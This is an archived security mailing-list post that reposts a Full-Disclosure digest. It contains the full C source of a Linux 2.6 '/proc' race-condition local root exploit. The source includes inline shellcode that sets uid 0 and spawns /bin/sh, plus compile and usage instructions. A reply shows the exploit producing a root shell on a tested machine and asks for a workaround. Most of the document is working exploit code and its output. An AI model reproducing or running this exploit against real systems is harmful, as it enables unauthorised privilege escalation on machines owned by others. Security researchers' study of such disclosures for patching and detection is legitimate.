Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[security-alerts] Linux Kernel "/proc" Race Condition exploit
> Subject: Full-Disclosure Digest, Vol 17, Issue 28
> ------------------------------
>
> Message: 15
> Date: Fri, 14 Jul 2006 22:43:43 +0100 (BST)
> From: "Joanna R." <h00lyshit@xxxxxxxx>
> Subject: [Full-disclosure] Linux kernel 0day - dynamite inside, don't burn your fingers
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <20060714214343.88743.qmail@xxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=iso-8859-1
>
> here again the c0de in body - I dunno whether it made it through the
> scrubbing. Normally I use telnet to the SMTP port to write mails, so I'm
> pretty lost using yahoo. Apologies for the inconvenience.
>
> ---------------------- cut ----------------------
>
> /*
> ** Author: h00lyshit
> ** Vulnerable: Linux 2.6 ALL
> ** Type of Vulnerability: Local Race
> ** Tested On : various distros
> ** Vendor Status: unknown
> **
> ** Disclaimer:
> ** In no event shall the author be liable for any damages
> ** whatsoever arising out of or in connection with the use
> ** or spread of this information.
> ** Any use of this information is at the user's own risk.
> **
> ** Compile:
> ** gcc h00lyshit.c -o h00lyshit
> **
> ** Usage:
> ** h00lyshit <very big file on the disk>
> **
> ** Example:
> ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
> **
> ** if y0u dont have one, make big file (~100MB) in /tmp with dd
> ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
> **
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sched.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <sys/prctl.h>
> #include <sys/mman.h>
> #include <sys/wait.h>
> #include <linux/a.out.h>
> #include <asm/unistd.h>
>
>
> static struct exec ex;
> static char *e[256];
> static char *a[4];
> static char b[512];
> static char t[256];
> static volatile int *c;
>
>
> /* h00lyshit shell code */
> __asm__ (" __excode: call 1f \n"
> " 1: mov $23, %eax \n"
> " xor %ebx, %ebx \n"
> " int $0x80 \n"
> " pop %eax \n"
> " mov $cmd-1b, %ebx \n"
> " add %eax, %ebx \n"
> " mov $arg-1b, %ecx \n"
> " add %eax, %ecx \n"
> " mov %ebx, (%ecx) \n"
> " mov %ecx, %edx \n"
> " add $4, %edx \n"
> " mov $11, %eax \n"
> " int $0x80 \n"
> " mov $1, %eax \n"
> " int $0x80 \n"
> " arg: .quad 0x00, 0x00 \n"
> " cmd: .string \"/bin/sh\" \n"
> " __excode_e: nop \n"
> " .global __excode \n"
> " .global __excode_e \n"
> );
>
>
>
> extern void (*__excode) (void);
> extern void (*__excode_e) (void);
>
>
> void
> error (char *err)
> {
> perror (err);
> fflush (stderr);
> exit (1);
> }
>
>
> /* exploit this shit */
> void
> exploit (char *file)
> {
> int i, fd;
> void *p;
> struct stat st;
>
> printf ("\ntrying to exploit %s\n\n", file);
> fflush (stdout);
> chmod ("/proc/self/environ", 04755);
> c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
> MAP_ANONYMOUS, 0, 0);
> memset ((void *) c, 0, 4096);
>
> /* slow down machine */
> fd = open (file, O_RDONLY);
> fstat (fd, &st);
> p =
> (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE,
> fd, 0);
> if (p == MAP_FAILED)
> error ("mmap");
> prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
> sprintf (t, "/proc/%d/environ", getpid ());
> sched_yield ();
> execve (NULL, a, e);
> madvise (0, 0, MADV_WILLNEED);
> i = fork ();
>
> /* give it a try */
> if (i)
> {
> (*c)++;
> !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
> prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
> sched_yield ();
> }
> else
> {
> nice(10);
> while (!(*c));
> sched_yield ();
> execve (t, a, e);
> error ("failed");
> }
>
> waitpid (i, NULL, 0);
> exit (0);
> }
>
>
> int
> main (int ac, char **av)
> {
> int i, j, k, s;
> char *p;
>
> memset (e, 0, sizeof (e));
> memset (a, 0, sizeof (a));
> a[0] = strdup (av[0]);
> a[1] = strdup (av[0]);
> a[2] = strdup (av[1]);
>
> if (ac < 2)
> error ("usage: binary <big file name>");
> if (ac > 2)
> exploit (av[2]);
> printf ("\npreparing");
> fflush (stdout);
>
> /* make setuid a.out */
> memset (&ex, 0, sizeof (ex));
> N_SET_MAGIC (ex, NMAGIC);
> N_SET_MACHTYPE (ex, M_386);
> s = ((unsigned) &__excode_e) - (unsigned) &__excode;
> ex.a_text = s;
> ex.a_syms = -(s + sizeof (ex));
>
> memset (b, 0, sizeof (b));
> memcpy (b, &ex, sizeof (ex));
> memcpy (b + sizeof (ex), &__excode, s);
>
> /* make environment */
> p = b;
> s += sizeof (ex);
> j = 0;
> for (i = k = 0; i < s; i++)
> {
> if (!p[i])
> {
> e[j++] = &p[k];
> k = i + 1;
> }
> }
>
> /* reexec */
> getcwd (t, sizeof (t));
> strcat (t, "/");
> strcat (t, av[0]);
> execve (t, a, e);
> error ("execve");
> return 0;
> }
>
>
>
>
>
>
>
> ------------------------------
>
> Message: 16
> Date: Fri, 14 Jul 2006 23:55:31 +0200
> From: Dan B <dan-fd@xxxxxxxxx>
> Subject: Re: [Full-disclosure] Linux kernel 0day - dynamite inside, don't burn your fingers
> To: "Joanna R." <h00lyshit@xxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <44B812D3.5000806@xxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hello,
>
> Joanna R. wrote:
> > Hello,
> >
> > attached 0day kernel 2.6 local root exploit. This is a new genuine
> > bug, unpatched in 2.6.17.4 - don't get confused by the prctl inside - it
> > is only used to change process status.
> Tested on
>
> dan@n-box ~ $ uname -a
> Linux n-box 2.6.16-gentoo-r9 #1 Fri Jun 9 16:44:22 CEST 2006 i686
> Intel(R) Pentium(R) M processor 2.00GHz GNU/Linux
>
> dan@n-box ~ $ ./h00lyshit ./Media/Audio/DnB/TheEngineer_060331.mp3
>
> preparing
> trying to exploit ./Media/Audio/DnB/TheEngineer_060331.mp3
>
> sh-3.1# id
> uid=0(root) gid=100(users)
> groups=7(lp),10(wheel),18(audio),27(video),35(games),81(apache),100(users),7353(svnusers)
> sh-3.1# whoami
> root
> sh-3.1#
>
>
> > The code exploits a root race in /proc
>
> So it does :)
> >
> > have a nice day.
>
> But this means that I've gotta worry about more servers now! Damn it!
>
> And is there a workaround to protect against this attack?
>
>
> Cheers,
> Dan.
>
>
>